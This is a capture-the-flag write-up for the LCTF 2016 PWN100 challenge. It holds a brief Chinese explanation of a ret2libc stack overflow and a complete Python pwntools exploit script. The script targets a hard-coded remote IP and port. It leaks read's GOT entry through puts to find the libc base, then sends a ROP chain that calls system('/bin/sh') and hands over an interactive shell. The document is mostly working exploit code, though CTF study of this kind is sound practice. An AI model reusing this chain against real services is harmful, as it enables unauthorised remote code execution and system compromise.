LCTF-2016-PWN100

栈溢出（ret2libc）。思路：先用 puts 打印 read 的 GOT 表项泄露 libc 地址，再以泄露地址的低 12 位在 libcdb.com 查询对应的 libc.so.6 及各关键函数偏移（或使用 libc-database），最后算出 system 和 "/bin/sh" 的地址。注意下面硬编码的偏移只对查到的那个 libc 版本有效，目标 libc 不同时必须重新查询。

#!/usr/bin/env python
from pwn import *
# Run mode switch: a truthy DEBUG spawns the binary locally with verbose
# pwntools logging and a gdb attached; anything else talks to the live target.
DEBUG = 1
if not DEBUG:
        p = remote('119.28.63.211', '2332')
else:
        context.log_level = 'debug'
        p = process('./pwn1003s4de5rf76tg87yhu')
        gdb.attach(p)

# libc offsets (relative to the libc load base) for the libc build matched
# from the leak. Only offset_read, offset_system and offset_str_bin_sh are
# consumed by pwn(); the rest are kept for reference. All of them are
# specific to one libc build and must be re-derived if the target's differs.
offset___libc_start_main_ret = 0x21f45
offset_system = 0x46590
offset_dup2 = 0xebe90
offset_read = 0xeb6a0
offset_write = 0xeb700
offset_str_bin_sh = 0x17c8c3

# Fixed addresses inside the binary itself (absolute values, so the binary is
# presumably not position independent).
pop_rdi = 0x400763   # presumably a `pop rdi; ret` gadget (first-argument loader)
plt_puts = 0x400500  # puts@plt, used to print the leaked GOT entry
got_read = 0x601028  # read@got.plt, the pointer that gets leaked
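# Junk bytes needed to reach the saved return address. The leak stage already
# uses 72, and the second stage re-enters the same overflow, so both chains
# must use the same distance; the original second-stage payload used 71,
# which would have put every gadget address one byte off.
_RET_OFFSET = 72
# Both payloads were padded to 200 bytes originally; presumably the fixed
# amount the vulnerable read consumes - TODO confirm against the binary.
_INPUT_LEN = 200


def _chain(*words):
        """Build one overflow payload.

        Junk up to the return address, then the given 64-bit words (gadget
        addresses and arguments) in order, space-padded to _INPUT_LEN like the
        original payloads.
        """
        rop = b''.join(p64(w) for w in words)
        return (b'a' * _RET_OFFSET + rop).ljust(_INPUT_LEN)


def pwn():
        """Two-stage ret2libc over the module-level connection `p`.

        Stage 1 overflows the stack to call puts(read@got), leaking the
        address of read inside libc, then returns into 0x40068E (presumably
        the start of the vulnerable routine) so the overflow can be hit again.
        Stage 2 computes system and "/bin/sh" from the leak, calls
        system("/bin/sh") and hands the shell to the user.

        Uses the module-level gadget/PLT/GOT addresses and libc offsets.
        Raises RuntimeError when the leak cannot be a valid libc pointer for
        the configured offsets (wrong libc build on the target).
        """
        # Stage 1: puts(got_read), then re-enter the vulnerable code.
        p.sendline(_chain(pop_rdi, got_read, plt_puts, 0x40068E))
        # recvn() instead of recv(): recv(5) may return fewer than 5 bytes, in
        # which case the pointer below would be parsed from the wrong offset.
        # NOTE(review): the 5 bytes are presumably a fixed message the binary
        # prints before returning - confirm against the target output.
        p.recvn(5)

        # puts stops at the first NUL byte, so a userland pointer arrives as
        # 6 significant bytes; zero-extend it to a full 64-bit value.
        addr_read = u64(p.recvn(6).ljust(8, b'\x00'))
        addr_libc = addr_read - offset_read
        # libc is mapped page-aligned, so an unaligned base proves the offsets
        # do not belong to the target's libc; bail out instead of firing a
        # chain that can only crash the process. (Alignment alone is not a
        # guarantee that the offsets are right.)
        if addr_libc & 0xfff:
                raise RuntimeError('leaked read=%#x gives unaligned libc base %#x; '
                                   'libc offsets do not match the target'
                                   % (addr_read, addr_libc))
        addr_system = addr_libc + offset_system
        addr_binsh = addr_libc + offset_str_bin_sh
        print('read: ' + hex(addr_read))
        print('libc: ' + hex(addr_libc))
        print('system: ' + hex(addr_system))
        print('binsh: ' + hex(addr_binsh))

        # Stage 2: system("/bin/sh"). The trailing word is only the return
        # address after system(), so any value does.
        p.sendline(_chain(pop_rdi, addr_binsh, addr_system, 0xdeadbeef))
        p.interactive()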
# Entry point: run the exploit only when executed as a script, not on import.
if __name__ == "__main__":
        pwn()

 
